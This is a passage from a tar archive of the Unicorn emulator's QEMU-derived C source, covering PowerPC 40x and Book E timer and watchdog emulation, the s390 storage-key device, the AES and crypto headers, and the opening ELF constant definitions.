tb_env->opaque; env->spr[SPR_40x_TSR] |= 1 << 27; if ((env->spr[SPR_40x_TCR] >> 26) & 0x1) { ppc_set_irq(cpu, ppc40x_timer->decr_excp, 1); } start_stop_pit(env, tb_env, 1); LOG_TB("%s: ar %d ir %d TCR " TARGET_FMT_lx " TSR " TARGET_FMT_lx " " "%016" PRIx64 "\n", __func__, (int)((env->spr[SPR_40x_TCR] >> 22) & 0x1), (int)((env->spr[SPR_40x_TCR] >> 26) & 0x1), env->spr[SPR_40x_TCR], env->spr[SPR_40x_TSR], ppc40x_timer->pit_reload); } /* Watchdog timer */ static void cpu_4xx_wdt_cb (void *opaque) { PowerPCCPU *cpu; CPUPPCState *env; ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; uint64_t now, next; env = opaque; cpu = env_archcpu(env); tb_env = env->tb_env; ppc40x_timer = tb_env->opaque; now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); switch ((env->spr[SPR_40x_TCR] >> 30) & 0x3) { case 0: next = 1 << 17; break; case 1: next = 1 << 21; break; case 2: next = 1 << 25; break; case 3: next = 1 << 29; break; default: /* Cannot occur, but makes gcc happy */ return; } next = now + muldiv64(next, NANOSECONDS_PER_SECOND, tb_env->decr_freq); if (next == now) next++; LOG_TB("%s: TCR " TARGET_FMT_lx " TSR " TARGET_FMT_lx "\n", __func__, env->spr[SPR_40x_TCR], env->spr[SPR_40x_TSR]); switch ((env->spr[SPR_40x_TSR] >> 30) & 0x3) { case 0x0: case 0x1: timer_mod(ppc40x_timer->wdt_timer, next); ppc40x_timer->wdt_next = next; env->spr[SPR_40x_TSR] |= 1U << 31; break; case 0x2: timer_mod(ppc40x_timer->wdt_timer, next); ppc40x_timer->wdt_next = next; env->spr[SPR_40x_TSR] |= 1 << 30; if ((env->spr[SPR_40x_TCR] >> 27) & 0x1) { ppc_set_irq(cpu, PPC_INTERRUPT_WDT, 1); } break; case 0x3: env->spr[SPR_40x_TSR] &= ~0x30000000; env->spr[SPR_40x_TSR] |= env->spr[SPR_40x_TCR] & 0x30000000; switch ((env->spr[SPR_40x_TCR] >> 28) & 0x3) { case 0x0: /* No reset */ break; case 0x1: /* Core reset */ ppc40x_core_reset(cpu); break; case 0x2: /* Chip reset */ ppc40x_chip_reset(cpu); break; case 0x3: /* System reset */ ppc40x_system_reset(cpu); break; } } } #endif void store_40x_pit (CPUPPCState *env, target_ulong val) { ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; tb_env = env->tb_env; ppc40x_timer = tb_env->opaque; LOG_TB("%s val" TARGET_FMT_lx "\n", __func__, val); ppc40x_timer->pit_reload = val; start_stop_pit(env, tb_env, 0); } target_ulong load_40x_pit (CPUPPCState *env) { return cpu_ppc_load_decr(env); } static void ppc_40x_set_tb_clk (void *opaque, uint32_t freq) { CPUPPCState *env = opaque; ppc_tb_t *tb_env = env->tb_env; LOG_TB("%s set new frequency to %" PRIu32 "\n", __func__, freq); tb_env->tb_freq = freq; tb_env->decr_freq = freq; /* XXX: we should also update all timers */ } clk_setup_cb ppc_40x_timers_init (CPUPPCState *env, uint32_t freq, unsigned int decr_excp) { #if 0 ppc_tb_t *tb_env; ppc40x_timer_t *ppc40x_timer; tb_env = g_malloc0(sizeof(ppc_tb_t)); env->tb_env = tb_env; tb_env->flags = PPC_DECR_UNDERFLOW_TRIGGERED; ppc40x_timer = g_malloc0(sizeof(ppc40x_timer_t)); tb_env->tb_freq = freq; tb_env->decr_freq = freq; tb_env->opaque = ppc40x_timer; LOG_TB("%s freq %" PRIu32 "\n", __func__, freq); if (ppc40x_timer != NULL) { /* We use decr timer for PIT */ tb_env->decr_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_4xx_pit_cb, env); ppc40x_timer->fit_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_4xx_fit_cb, env); ppc40x_timer->wdt_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &cpu_4xx_wdt_cb, env); ppc40x_timer->decr_excp = decr_excp; } #endif return &ppc_40x_set_tb_clk; } /*****************************************************************************/ /* Embedded PowerPC Device Control Registers */ typedef struct ppc_dcrn_t ppc_dcrn_t; struct ppc_dcrn_t { dcr_read_cb dcr_read; dcr_write_cb dcr_write; void *opaque; }; /* XXX: on 460, DCR addresses are 32 bits wide, * using DCRIPR to get the 22 upper bits of the DCR address */ #define DCRN_NB 1024 struct ppc_dcr_t { ppc_dcrn_t dcrn[DCRN_NB]; int (*read_error)(int dcrn); int (*write_error)(int dcrn); }; int ppc_dcr_read (ppc_dcr_t *dcr_env, int dcrn, uint32_t *valp) { ppc_dcrn_t *dcr; if (dcrn < 0 || dcrn >= DCRN_NB) goto error; dcr = &dcr_env->dcrn[dcrn]; if (dcr->dcr_read == NULL) goto error; *valp = (*dcr->dcr_read)(dcr->opaque, dcrn); return 0; error: if (dcr_env->read_error != NULL) return (*dcr_env->read_error)(dcrn); return -1; } int ppc_dcr_write (ppc_dcr_t *dcr_env, int dcrn, uint32_t val) { ppc_dcrn_t *dcr; if (dcrn < 0 || dcrn >= DCRN_NB) goto error; dcr = &dcr_env->dcrn[dcrn]; if (dcr->dcr_write == NULL) goto error; (*dcr->dcr_write)(dcr->opaque, dcrn, val); return 0; error: if (dcr_env->write_error != NULL) return (*dcr_env->write_error)(dcrn); return -1; } int ppc_dcr_register (CPUPPCState *env, int dcrn, void *opaque, dcr_read_cb dcr_read, dcr_write_cb dcr_write) { ppc_dcr_t *dcr_env; ppc_dcrn_t *dcr; dcr_env = env->dcr_env; if (dcr_env == NULL) return -1; if (dcrn < 0 || dcrn >= DCRN_NB) return -1; dcr = &dcr_env->dcrn[dcrn]; if (dcr->opaque != NULL || dcr->dcr_read != NULL || dcr->dcr_write != NULL) return -1; dcr->opaque = opaque; dcr->dcr_read = dcr_read; dcr->dcr_write = dcr_write; return 0; } int ppc_dcr_init (CPUPPCState *env, int (*read_error)(int dcrn), int (*write_error)(int dcrn)) { ppc_dcr_t *dcr_env; dcr_env = g_malloc0(sizeof(ppc_dcr_t)); dcr_env->read_error = read_error; dcr_env->write_error = write_error; env->dcr_env = dcr_env; return 0; } /*****************************************************************************/ int ppc_cpu_pir(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; return env->spr_cb[SPR_PIR].default_value; } #if 0 PowerPCCPU *ppc_get_vcpu_by_pir(int pir) { CPUState *cs; CPU_FOREACH(cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); if (ppc_cpu_pir(cpu) == pir) { return cpu; } } return NULL; } #endif void ppc_irq_reset(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; env->irq_input_state = 0; // kvmppc_set_interrupt(cpu, PPC_INTERRUPT_EXT, 0); } ��������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/ppc/ppc_booke.c���������������������������������������������������������������0000664�0000000�0000000�00000027162�14675241067�0017470�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU PowerPC Booke hardware System Emulator * * Copyright (c) 2011 AdaCore * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "cpu.h" #include "hw/ppc/ppc.h" #include "qemu/timer.h" #include "qemu/log.h" // #include "kvm_ppc.h" /* Timer Control Register */ #define TCR_WP_SHIFT 30 /* Watchdog Timer Period */ #define TCR_WP_MASK (0x3U << TCR_WP_SHIFT) #define TCR_WRC_SHIFT 28 /* Watchdog Timer Reset Control */ #define TCR_WRC_MASK (0x3U << TCR_WRC_SHIFT) #define TCR_WIE (1U << 27) /* Watchdog Timer Interrupt Enable */ #define TCR_DIE (1U << 26) /* Decrementer Interrupt Enable */ #define TCR_FP_SHIFT 24 /* Fixed-Interval Timer Period */ #define TCR_FP_MASK (0x3U << TCR_FP_SHIFT) #define TCR_FIE (1U << 23) /* Fixed-Interval Timer Interrupt Enable */ #define TCR_ARE (1U << 22) /* Auto-Reload Enable */ /* Timer Control Register (e500 specific fields) */ #define TCR_E500_FPEXT_SHIFT 13 /* Fixed-Interval Timer Period Extension */ #define TCR_E500_FPEXT_MASK (0xf << TCR_E500_FPEXT_SHIFT) #define TCR_E500_WPEXT_SHIFT 17 /* Watchdog Timer Period Extension */ #define TCR_E500_WPEXT_MASK (0xf << TCR_E500_WPEXT_SHIFT) /* Timer Status Register */ #define TSR_FIS (1U << 26) /* Fixed-Interval Timer Interrupt Status */ #define TSR_DIS (1U << 27) /* Decrementer Interrupt Status */ #define TSR_WRS_SHIFT 28 /* Watchdog Timer Reset Status */ #define TSR_WRS_MASK (0x3U << TSR_WRS_SHIFT) #define TSR_WIS (1U << 30) /* Watchdog Timer Interrupt Status */ #define TSR_ENW (1U << 31) /* Enable Next Watchdog Timer */ typedef struct booke_timer_t booke_timer_t; struct booke_timer_t { uint64_t fit_next; QEMUTimer *fit_timer; uint64_t wdt_next; QEMUTimer *wdt_timer; uint32_t flags; }; static void booke_update_irq(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; ppc_set_irq(cpu, PPC_INTERRUPT_DECR, (env->spr[SPR_BOOKE_TSR] & TSR_DIS && env->spr[SPR_BOOKE_TCR] & TCR_DIE)); ppc_set_irq(cpu, PPC_INTERRUPT_WDT, (env->spr[SPR_BOOKE_TSR] & TSR_WIS && env->spr[SPR_BOOKE_TCR] & TCR_WIE)); ppc_set_irq(cpu, PPC_INTERRUPT_FIT, (env->spr[SPR_BOOKE_TSR] & TSR_FIS && env->spr[SPR_BOOKE_TCR] & TCR_FIE)); } /* Return the location of the bit of time base at which the FIT will raise an interrupt */ static uint8_t booke_get_fit_target(CPUPPCState *env, ppc_tb_t *tb_env) { uint8_t fp = (env->spr[SPR_BOOKE_TCR] & TCR_FP_MASK) >> TCR_FP_SHIFT; if (tb_env->flags & PPC_TIMER_E500) { /* e500 Fixed-interval timer period extension */ uint32_t fpext = (env->spr[SPR_BOOKE_TCR] & TCR_E500_FPEXT_MASK) >> TCR_E500_FPEXT_SHIFT; fp = 63 - (fp | fpext << 2); } else { fp = env->fit_period[fp]; } return fp; } /* Return the location of the bit of time base at which the WDT will raise an interrupt */ static uint8_t booke_get_wdt_target(CPUPPCState *env, ppc_tb_t *tb_env) { uint8_t wp = (env->spr[SPR_BOOKE_TCR] & TCR_WP_MASK) >> TCR_WP_SHIFT; if (tb_env->flags & PPC_TIMER_E500) { /* e500 Watchdog timer period extension */ uint32_t wpext = (env->spr[SPR_BOOKE_TCR] & TCR_E500_WPEXT_MASK) >> TCR_E500_WPEXT_SHIFT; wp = 63 - (wp | wpext << 2); } else { wp = env->wdt_period[wp]; } return wp; } static void booke_update_fixed_timer(CPUPPCState *env, uint8_t target_bit, uint64_t *next, QEMUTimer *timer, int tsr_bit) { #if 0 ppc_tb_t *tb_env = env->tb_env; uint64_t delta_tick, ticks = 0; uint64_t tb; uint64_t period; uint64_t now; if (!(env->spr[SPR_BOOKE_TSR] & tsr_bit)) { /* * Don't arm the timer again when the guest has the current * interrupt still pending. Wait for it to ack it. */ return; } now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); tb = cpu_ppc_get_tb(tb_env, now, tb_env->tb_offset); period = 1ULL << target_bit; delta_tick = period - (tb & (period - 1)); /* the timer triggers only when the selected bit toggles from 0 to 1 */ if (tb & period) { ticks = period; } if (ticks + delta_tick < ticks) { /* Overflow, so assume the biggest number we can express. */ ticks = UINT64_MAX; } else { ticks += delta_tick; } *next = now + muldiv64(ticks, NANOSECONDS_PER_SECOND, tb_env->tb_freq); if ((*next < now) || (*next > INT64_MAX)) { /* Overflow, so assume the biggest number the qemu timer supports. */ *next = INT64_MAX; } /* XXX: If expire time is now. We can't run the callback because we don't * have access to it. So we just set the timer one nanosecond later. */ if (*next == now) { (*next)++; } else { /* * There's no point to fake any granularity that's more fine grained * than milliseconds. Anything beyond that just overloads the system. */ *next = MAX(*next, now + SCALE_MS); } /* Fire the next timer */ timer_mod(timer, *next); #endif } static void booke_decr_cb(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; env->spr[SPR_BOOKE_TSR] |= TSR_DIS; booke_update_irq(cpu); if (env->spr[SPR_BOOKE_TCR] & TCR_ARE) { /* Do not reload 0, it is already there. It would just trigger * the timer again and lead to infinite loop */ if (env->spr[SPR_BOOKE_DECAR] != 0) { /* Auto Reload */ cpu_ppc_store_decr(env, env->spr[SPR_BOOKE_DECAR]); } } } static void booke_fit_cb(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; ppc_tb_t *tb_env; booke_timer_t *booke_timer; tb_env = env->tb_env; booke_timer = tb_env->opaque; env->spr[SPR_BOOKE_TSR] |= TSR_FIS; booke_update_irq(cpu); booke_update_fixed_timer(env, booke_get_fit_target(env, tb_env), &booke_timer->fit_next, booke_timer->fit_timer, TSR_FIS); } static void booke_wdt_cb(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; ppc_tb_t *tb_env; booke_timer_t *booke_timer; tb_env = env->tb_env; booke_timer = tb_env->opaque; /* TODO: There's lots of complicated stuff to do here */ booke_update_irq(cpu); booke_update_fixed_timer(env, booke_get_wdt_target(env, tb_env), &booke_timer->wdt_next, booke_timer->wdt_timer, TSR_WIS); } void store_booke_tsr(CPUPPCState *env, target_ulong val) { PowerPCCPU *cpu = env_archcpu(env); ppc_tb_t *tb_env = env->tb_env; booke_timer_t *booke_timer = tb_env->opaque; env->spr[SPR_BOOKE_TSR] &= ~val; // kvmppc_clear_tsr_bits(cpu, val); if (val & TSR_FIS) { booke_update_fixed_timer(env, booke_get_fit_target(env, tb_env), &booke_timer->fit_next, booke_timer->fit_timer, TSR_FIS); } if (val & TSR_WIS) { booke_update_fixed_timer(env, booke_get_wdt_target(env, tb_env), &booke_timer->wdt_next, booke_timer->wdt_timer, TSR_WIS); } booke_update_irq(cpu); } void store_booke_tcr(CPUPPCState *env, target_ulong val) { PowerPCCPU *cpu = env_archcpu(env); ppc_tb_t *tb_env = env->tb_env; booke_timer_t *booke_timer = tb_env->opaque; env->spr[SPR_BOOKE_TCR] = val; // kvmppc_set_tcr(cpu); booke_update_irq(cpu); booke_update_fixed_timer(env, booke_get_fit_target(env, tb_env), &booke_timer->fit_next, booke_timer->fit_timer, TSR_FIS); booke_update_fixed_timer(env, booke_get_wdt_target(env, tb_env), &booke_timer->wdt_next, booke_timer->wdt_timer, TSR_WIS); } #if 0 static void ppc_booke_timer_reset_handle(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; store_booke_tcr(env, 0); store_booke_tsr(env, -1); } /* * This function will be called whenever the CPU state changes. * CPU states are defined "typedef enum RunState". * Regarding timer, When CPU state changes to running after debug halt * or similar cases which takes time then in between final watchdog * expiry happenes. This will cause exit to QEMU and configured watchdog * action will be taken. To avoid this we always clear the watchdog state when * state changes to running. */ static void cpu_state_change_handler(void *opaque, int running, RunState state) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; if (!running) { return; } /* * Clear watchdog interrupt condition by clearing TSR. */ store_booke_tsr(env, TSR_ENW | TSR_WIS | TSR_WRS_MASK); } #endif void ppc_booke_timers_init(PowerPCCPU *cpu, uint32_t freq, uint32_t flags) { ppc_tb_t *tb_env; booke_timer_t *booke_timer; tb_env = g_malloc0(sizeof(ppc_tb_t)); booke_timer = g_malloc0(sizeof(booke_timer_t)); cpu->env.tb_env = tb_env; tb_env->flags = flags | PPC_TIMER_BOOKE | PPC_DECR_ZERO_TRIGGERED; tb_env->tb_freq = freq; tb_env->decr_freq = freq; tb_env->opaque = booke_timer; tb_env->decr_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &booke_decr_cb, cpu); booke_timer->fit_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &booke_fit_cb, cpu); booke_timer->wdt_timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &booke_wdt_cb, cpu); #if 0 int ret = 0; ret = kvmppc_booke_watchdog_enable(cpu); if (ret) { /* TODO: Start the QEMU emulated watchdog if not running on KVM. * Also start the QEMU emulated watchdog if KVM does not support * emulated watchdog or somehow it is not enabled (supported but * not enabled is though some bug and requires debugging :)). */ } qemu_add_vm_change_state_handler(cpu_state_change_handler, cpu); qemu_register_reset(ppc_booke_timer_reset_handle, cpu); #endif } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/s390x/������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015457�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/hw/s390x/s390-skeys.c������������������������������������������������������������0000664�0000000�0000000�00000007660�14675241067�0017466�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * s390 storage key device * * Copyright 2015 IBM Corp. * Author(s): Jason J. Herne <jjherne@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "target/s390x/cpu.h" #include "hw/s390x/storage-keys.h" #define S390_SKEYS_BUFFER_SIZE (128 * KiB) /* Room for 128k storage keys */ #define S390_SKEYS_SAVE_FLAG_EOS 0x01 #define S390_SKEYS_SAVE_FLAG_SKEYS 0x02 #define S390_SKEYS_SAVE_FLAG_ERROR 0x04 static void s390_skeys_class_init(uc_engine *uc, S390SKeysClass* class); static void qemu_s390_skeys_class_init(uc_engine *uc, S390SKeysClass* skeyclass); static void s390_skeys_instance_init(uc_engine *uc, S390SKeysState* ss); static void qemu_s390_skeys_init(uc_engine *uc, QEMUS390SKeysState *skey); void s390_skeys_init(uc_engine *uc) { S390CPU *cpu = S390_CPU(uc->cpu); s390_skeys_class_init(uc, &cpu->skey); qemu_s390_skeys_class_init(uc, &cpu->skey); s390_skeys_instance_init(uc, (S390SKeysState*)&cpu->ss); qemu_s390_skeys_init(uc, &cpu->ss); cpu->ss.class = &cpu->skey; } static void qemu_s390_skeys_init(uc_engine *uc, QEMUS390SKeysState *skeys) { //QEMUS390SKeysState *skeys = QEMU_S390_SKEYS(obj); //MachineState *machine = MACHINE(qdev_get_machine()); //skeys->key_count = machine->ram_size / TARGET_PAGE_SIZE; // Unicorn: Allow users to configure this value? skeys->key_count = 0x20000000 / TARGET_PAGE_SIZE; skeys->keydata = g_malloc0(skeys->key_count); } static int qemu_s390_skeys_enabled(S390SKeysState *ss) { return 1; } /* * TODO: for memory hotplug support qemu_s390_skeys_set and qemu_s390_skeys_get * will have to make sure that the given gfn belongs to a memory region and not * a memory hole. */ static int qemu_s390_skeys_set(S390SKeysState *ss, uint64_t start_gfn, uint64_t count, uint8_t *keys) { QEMUS390SKeysState *skeydev = QEMU_S390_SKEYS(ss); int i; /* Check for uint64 overflow and access beyond end of key data */ if (start_gfn + count > skeydev->key_count || start_gfn + count < count) { // error_report("Error: Setting storage keys for page beyond the end " // "of memory: gfn=%" PRIx64 " count=%" PRId64, // start_gfn, count); return -EINVAL; } for (i = 0; i < count; i++) { skeydev->keydata[start_gfn + i] = keys[i]; } return 0; } static int qemu_s390_skeys_get(S390SKeysState *ss, uint64_t start_gfn, uint64_t count, uint8_t *keys) { QEMUS390SKeysState *skeydev = QEMU_S390_SKEYS(ss); int i; /* Check for uint64 overflow and access beyond end of key data */ if (start_gfn + count > skeydev->key_count || start_gfn + count < count) { // error_report("Error: Getting storage keys for page beyond the end " // "of memory: gfn=%" PRIx64 " count=%" PRId64, // start_gfn, count); return -EINVAL; } for (i = 0; i < count; i++) { keys[i] = skeydev->keydata[start_gfn + i]; } return 0; } static void qemu_s390_skeys_class_init(uc_engine *uc, S390SKeysClass* skeyclass) { // S390SKeysClass *skeyclass = S390_SKEYS_CLASS(oc); // DeviceClass *dc = DEVICE_CLASS(oc); skeyclass->skeys_enabled = qemu_s390_skeys_enabled; skeyclass->get_skeys = qemu_s390_skeys_get; skeyclass->set_skeys = qemu_s390_skeys_set; /* Reason: Internal device (only one skeys device for the whole memory) */ // dc->user_creatable = false; } static void s390_skeys_instance_init(uc_engine *uc, S390SKeysState* ss) { ss->migration_enabled = true; } static void s390_skeys_class_init(uc_engine *uc, S390SKeysClass* class) { // DeviceClass *dc = DEVICE_CLASS(oc); // dc->hotpluggable = false; // set_bit(DEVICE_CATEGORY_MISC, dc->categories); } ��������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015576�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/crypto/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017116�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/crypto/aes.h�������������������������������������������������������������0000664�0000000�0000000�00000004124�14675241067�0020040�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_AES_H #define QEMU_AES_H #define AES_MAXNR 14 #define AES_BLOCK_SIZE 16 struct aes_key_st { uint32_t rd_key[4 *(AES_MAXNR + 1)]; int rounds; }; typedef struct aes_key_st AES_KEY; /* FreeBSD/OpenSSL have their own AES functions with the same names in -lcrypto * (which might be pulled in via curl), so redefine to avoid conflicts. */ #define AES_set_encrypt_key QEMU_AES_set_encrypt_key #define AES_set_decrypt_key QEMU_AES_set_decrypt_key #define AES_encrypt QEMU_AES_encrypt #define AES_decrypt QEMU_AES_decrypt #define AES_cbc_encrypt QEMU_AES_cbc_encrypt int AES_set_encrypt_key(const unsigned char *userKey, const int bits, AES_KEY *key); int AES_set_decrypt_key(const unsigned char *userKey, const int bits, AES_KEY *key); void AES_encrypt(const unsigned char *in, unsigned char *out, const AES_KEY *key); void AES_decrypt(const unsigned char *in, unsigned char *out, const AES_KEY *key); void AES_cbc_encrypt(const unsigned char *in, unsigned char *out, const unsigned long length, const AES_KEY *key, unsigned char *ivec, const int enc); extern const uint8_t AES_sbox[256]; extern const uint8_t AES_isbox[256]; /* AES ShiftRows and InvShiftRows */ extern const uint8_t AES_shifts[16]; extern const uint8_t AES_ishifts[16]; /* AES InvMixColumns */ /* AES_imc[x][0] = [x].[0e, 09, 0d, 0b]; */ /* AES_imc[x][1] = [x].[0b, 0e, 09, 0d]; */ /* AES_imc[x][2] = [x].[0d, 0b, 0e, 09]; */ /* AES_imc[x][3] = [x].[09, 0d, 0b, 0e]; */ extern const uint32_t AES_imc[256][4]; /* AES_Te0[x] = S [x].[02, 01, 01, 03]; AES_Te1[x] = S [x].[03, 02, 01, 01]; AES_Te2[x] = S [x].[01, 03, 02, 01]; AES_Te3[x] = S [x].[01, 01, 03, 02]; AES_Te4[x] = S [x].[01, 01, 01, 01]; AES_Td0[x] = Si[x].[0e, 09, 0d, 0b]; AES_Td1[x] = Si[x].[0b, 0e, 09, 0d]; AES_Td2[x] = Si[x].[0d, 0b, 0e, 09]; AES_Td3[x] = Si[x].[09, 0d, 0b, 0e]; AES_Td4[x] = Si[x].[01, 01, 01, 01]; */ extern const uint32_t AES_Te0[256], AES_Te1[256], AES_Te2[256], AES_Te3[256], AES_Te4[256]; extern const uint32_t AES_Td0[256], AES_Td1[256], AES_Td2[256], AES_Td3[256], AES_Td4[256]; #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/crypto/init.h������������������������������������������������������������0000664�0000000�0000000�00000001564�14675241067�0020240�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU Crypto initialization * * Copyright (c) 2015 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. * */ #ifndef QCRYPTO_INIT_H #define QCRYPTO_INIT_H #include "qapi/error.h" int qcrypto_init(Error **errp); #endif /* QCRYPTO_INIT_H */ ��������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/crypto/random.h����������������������������������������������������������0000664�0000000�0000000�00000001760�14675241067�0020553�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU Crypto random number provider * * Copyright (c) 2015-2016 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. * */ #ifndef QCRYPTO_RANDOM_H #define QCRYPTO_RANDOM_H /** * qcrypto_random_init: * * Initializes the handles used by qcrypto_random_bytes * * Returns 0 on success, -1 on error */ int qcrypto_random_init(void); #endif /* QCRYPTO_RANDOM_H */ ����������������unicorn-2.1.1/qemu/include/elf.h��������������������������������������������������������������������0000664�0000000�0000000�00000205767�14675241067�0016536�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_ELF_H #define QEMU_ELF_H /* 32-bit ELF base types. */ typedef uint32_t Elf32_Addr; typedef uint16_t Elf32_Half; typedef uint32_t Elf32_Off; typedef int32_t Elf32_Sword; typedef uint32_t Elf32_Word; /* 64-bit ELF base types. */ typedef uint64_t Elf64_Addr; typedef uint16_t Elf64_Half; typedef int16_t Elf64_SHalf; typedef uint64_t Elf64_Off; typedef int32_t Elf64_Sword; typedef uint32_t Elf64_Word; typedef uint64_t Elf64_Xword; typedef int64_t Elf64_Sxword; /* These constants are for the segment types stored in the image headers */ #define PT_NULL 0 #define PT_LOAD 1 #define PT_DYNAMIC 2 #define PT_INTERP 3 #define PT_NOTE 4 #define PT_SHLIB 5 #define PT_PHDR 6 #define PT_LOPROC 0x70000000 #define PT_HIPROC 0x7fffffff #define PT_MIPS_REGINFO 0x70000000 #define PT_MIPS_RTPROC 0x70000001 #define PT_MIPS_OPTIONS 0x70000002 #define PT_MIPS_ABIFLAGS 0x70000003 /* Flags in the e_flags field of the header */ /* MIPS architecture level. */ #define EF_MIPS_ARCH 0xf0000000 /* Legal values for MIPS architecture level. */ #define EF_MIPS_ARCH_1 0x00000000 /* -mips1 code. */ #define EF_MIPS_ARCH_2 0x10000000 /* -mips2 code. */ #define EF_MIPS_ARCH_3 0x20000000 /* -mips3 code. */ #define EF_MIPS_ARCH_4 0x30000000 /* -mips4 code. */ #define EF_MIPS_ARCH_5 0x40000000 /* -mips5 code. */ #define EF_MIPS_ARCH_32 0x50000000 /* MIPS32 code. */ #define EF_MIPS_ARCH_64 0x60000000 /* MIPS64 code. */ #define EF_MIPS_ARCH_32R2 0x70000000 /* MIPS32r2 code. */ #define EF_MIPS_ARCH_64R2 0x80000000 /* MIPS64r2 code. */ #define EF_MIPS_ARCH_32R6 0x90000000 /* MIPS32r6 code. */ #define EF_MIPS_ARCH_64R6 0xa0000000 /* MIPS64r6 code. */ /* The ABI of a file. */ #define EF_MIPS_ABI_O32 0x00001000 /* O32 ABI. */ #define EF_MIPS_ABI_O64 0x00002000 /* O32 extended for 64 bit. */ #define EF_MIPS_NOREORDER 0x00000001 #define EF_MIPS_PIC 0x00000002 #define EF_MIPS_CPIC 0x00000004 #define EF_MIPS_ABI2 0x00000020 #define EF_MIPS_OPTIONS_FIRST 0x00000080 #define EF_MIPS_32BITMODE 0x00000100 #define EF_MIPS_ABI 0x0000f000 #define EF_MIPS_FP64 0x00000200 #define EF_MIPS_NAN2008 0x00000400 /* MIPS machine variant */ #define EF_MIPS_MACH_NONE 0x00000000 /* A standard MIPS implementation */ 